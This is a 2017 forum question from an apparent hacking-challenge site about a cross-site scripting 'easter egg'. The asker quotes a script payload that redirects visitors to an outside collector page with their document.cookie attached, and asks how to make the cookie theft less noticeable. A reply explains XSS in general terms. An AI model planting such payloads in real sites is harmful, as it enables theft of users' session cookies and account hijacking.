Questions and Answers

How do I collect points?

  • +5
    Chosen as best answer
  • +1
    Posted answer
  • +1
    Posted question
  • +1
    Thumb up
  • -1
    Thumb down
96

by ccccombobreaker in Challenge Help about March 15, 2017 open - report

Easter egg, XSS & cookie stealing

Hi

some of you already found easter egg 5...

could someone explain the xss part a little more for me?

to test the script, i made myself a website. after document.cookie ("test=123"); i created a cookie i could 'steal'.

so, because i don't have a xss hole, i thought just putting 

<script>window.location('http://www.yoursite.com/cookies.php?c=' + document.cookie)</script>

into the sourcecode would have the same effect (right?). but now, as soon as i open the page it redirects me to http://www.mysite.com/cookies.php and displays the cookies i tried to steal.

not very stealthy

i mean the rest of the scripts works perfectly fine, the cookies and everything get into my 123cookies file, but still... did i do something wrong?

could somebody explain how to do it right :/

 

-cccc

Answer: 1 • Score 1 • Views: 583
Browse by
  • 25

    by Dragon0890 about March 29, 2017

    So I'm not sure i am the person to ask, but I think I might see what you are doing wrong. So the idea behind XSS is that you put script into the website and when someone else stumbles across your code it runs and sends you something that says this is what their cookie is. The places that this usually happens is in forums and comment areas that are vulnerable, someone will inject some code into the website using their forums, so when the code is run by the web browser the person that injected the code has access to anything that the website had access to. If you want to check out more check this website. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

You must login to post an answer.